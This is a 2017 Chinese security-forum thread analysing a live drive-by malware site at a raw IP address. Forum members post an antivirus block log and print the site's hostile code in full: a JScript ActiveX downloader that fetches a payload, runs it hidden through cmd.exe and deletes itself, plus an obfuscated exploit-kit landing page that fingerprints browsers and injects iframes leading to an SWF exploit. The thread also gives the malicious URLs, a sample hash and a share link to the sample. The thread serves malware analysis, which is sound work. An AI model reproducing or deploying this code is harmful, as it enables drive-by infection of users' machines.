http://125.65.83.220/

显示全部楼层 · 发表于 2017-1-22 19:40:04

显示全部楼层 · 发表于 2017-1-22 19:49:19

22.01.2017 19.48.50;Download blocked;http://125.65.83.220/ErsJg.html;HEUR:Exploit.Script.Generic;http://125.65.83.220/ErsJg.html;360安全浏览器;Trojan program;01/22/2017 19:48:50

斯基

显示全部楼层 · 发表于 2017-1-23 02:40:17

[mw_shl_code=javascript,true]<script id="jiami" type="text/html">
try{function HttpGet(dUrl){var req=new ActiveXObject('WinHTTP.WinHTTPRequest.5.1');req.setProxy(0);req.open('GET',dUrl,0);req.Send();if(200==req.status)return req['responseText'];}
var fileObj=new ActiveXObject('Scripting.FileSystemObject');var shell=new ActiveXObject('WScript.Shell');var fileName=WScript['ScriptFullName'];args=WScript.Arguments;var stream=new ActiveXObject('ADODB.Stream');stream.Type=2;stream.Charset='iso-8859-1';stream.Open();result=HttpGet('dmt');stream.writetext(result);cmd='fna';stream.savetofile(cmd,2);stream.Close();shell.run('cmd.exe /c '+cmd,0);}catch(Y){}
fileObj['Deletefile'](fileName);
</script>[/mw_shl_code]

script id="jiami"

233333333

显示全部楼层 · 发表于 2017-1-23 02:52:04

本帖最后由 m220011 于 2017-1-23 03:17 编辑

to

[mw_shl_code=javascript,true]<html>

      <head>
            <meta name="renderer" content="ie-comp">
      </head>

      <body>
            <script type="text/javascript">
                     var _0xafa7 = ["SmrTss", "ErsJg", "srt", "toLowerCase", "userAgent", "getDate", "setDate", "cookie", "=", "", ";expires=", "toGMTString", "(^| )", "=([^;]*)(;|$)", "match", "chrome", "indexOf", "mimeTypes", "reload", "location", "<iframe src=", ".html width=30 height=1></iframe>", "writeln", "<form name='tbf' action='index.html' method='get' target='_blank'><input type='text' name='id' value='1' /></form>", "submit", "tbf", "forms", "opener", "_self", "open", "close", "mlcs", "myrefresh()", "type", "application/vnd.chromium.remoting-viewer", " ", "qqbrowser", "index.html", "msie", "nt 5", "nt 6", "msie 10", "trident", "rv:11", "window.location='", ".html'"];
                     var bugatti = _0xafa7[0],
                              ferrari = _0xafa7[1],
                              astonmartin = _0xafa7[2];
                     var WhatIE = navigator[_0xafa7[4]][_0xafa7[3]]();

                     function setCookie(_0x24a6x6, _0x24a6x7, _0x24a6x8) {
                              var _0x24a6x9 = new Date();
                              _0x24a6x9[_0xafa7[6]](_0x24a6x9[_0xafa7[5]]() + _0x24a6x8);
                              document[_0xafa7[7]] = _0x24a6x6 + _0xafa7[8] + escape(_0x24a6x7) + ((_0x24a6x8 == null) ? _0xafa7[9] : _0xafa7[10] + _0x24a6x9[_0xafa7[11]]())
                     }

                     function getCookie(_0x24a6xb) {
                              var _0x24a6xc, _0x24a6xd = new RegExp(_0xafa7[12] + _0x24a6xb + _0xafa7[13]);
                              if(_0x24a6xc = document[_0xafa7[7]][_0xafa7[14]](_0x24a6xd)) {
                                    return true
                              } else {
                                    return false
                              }
                     }

                     function isChrome() {
                              var _0x24a6xf = navigator[_0xafa7[4]][_0xafa7[3]]();
                              return _0x24a6xf[_0xafa7[16]](_0xafa7[15]) > 1
                     }

                     function _mime(_0x24a6x11, _0x24a6x7) {
                              var _0x24a6x12 = navigator[_0xafa7[17]];
                              for(var _0x24a6x13 in _0x24a6x12) {
                                    if(_0x24a6x12[_0x24a6x13][_0x24a6x11] == _0x24a6x7) {
                                             return true
                                    }
                              };
                              return false
                     }

                     function myrefresh() {
                              window[_0xafa7[19]][_0xafa7[18]]()
                     }

                     function bu() {
                              document[_0xafa7[22]](_0xafa7[20] + bugatti + _0xafa7[21])
                     }

                     function fe() {
                              document[_0xafa7[22]](_0xafa7[20] + ferrari + _0xafa7[21])
                     }

                     function openN(_0x24a6x18) {
                              document[_0xafa7[22]](_0xafa7[23])
                     }

                     function sumit() {
                              document[_0xafa7[26]][_0xafa7[25]][_0xafa7[24]]();
                              window[_0xafa7[27]] = null;
                              window[_0xafa7[29]](_0xafa7[9], _0xafa7[28]);
                              window[_0xafa7[30]]()
                     }
                     if(!getCookie(astonmartin)) {
                              setCookie(astonmartin, _0xafa7[31], 1);
                              setTimeout(_0xafa7[32], 1000)
                     };
                     var is = false;
                     if(isChrome()) {
                              is = _mime(_0xafa7[33], _0xafa7[34]);
                              if(is) {
                                    document[_0xafa7[22]](_0xafa7[35])
                              }
                     };
                     if(!is) {
                              if(isChrome() && WhatIE[_0xafa7[16]](_0xafa7[36]) > -1) {
                                    openN(_0xafa7[37]);
                                    sumit()
                              } else {
                                    if(WhatIE[_0xafa7[16]](_0xafa7[38]) > -1 || WhatIE[_0xafa7[16]](_0xafa7[39]) > -1 || WhatIE[_0xafa7[16]](_0xafa7[40]) > -1) {
                                             fe()
                                    } else {
                                             if(WhatIE[_0xafa7[16]](_0xafa7[40]) > -1 && WhatIE[_0xafa7[16]](_0xafa7[41]) > -1) {
                                                      bu()
                                             } else {
                                                      if(WhatIE[_0xafa7[16]](_0xafa7[42]) > -1 && WhatIE[_0xafa7[16]](_0xafa7[43]) > -1) {
                                                            setTimeout(_0xafa7[44] + bugatti + _0xafa7[45], 6000)
                                                      }
                                             }
                                    }
                              }
                     }
            </script>
      </body>

</html>[/mw_shl_code]

to

<iframe src=ErsJg.html width=30 height=1></iframe>

to

http://125.65.83.220:280/mstsc.swf

https://www.virustotal.com/zh-cn ... nalysis/1485112329/

SHA256: c9e925743942f0aa3782ac84389d9ecf9a080492ea02797206b6cef095b5a0d0
文件名： mstsc.swf
检出率： 2 / 54

手生了，解得好慢啊，附件上不来，算了。

显示全部楼层 · 发表于 2017-1-23 09:29:08

头一回看到360有这种弹窗。以前360给我的印象都是挂马网页概不拦截的，不知这次是不是事前拉黑的？

显示全部楼层 · 发表于 2017-1-23 12:10:58

m220011 发表于 2017-1-23 02:52
to

[mw_shl_code=javascript,true]

大神来了

显示全部楼层 · 发表于 2017-1-23 16:48:29

本帖最后由 aboringman 于 2017-1-23 16:49 编辑

m220011 发表于 2017-1-23 02:52
to

[mw_shl_code=javascript,true]

帮你补附件吧。【已改正】

链接：https://share.weiyun.com/08308ea101625a0941c9b531f4bd38a2 （密码：LX8Egl）

显示全部楼层 · 发表于 2017-1-23 20:53:21

bitdefender不报

显示全部楼层 · 发表于 2017-1-26 08:49:10

小红伞杀

[未鉴定] http://125.65.83.220/

评分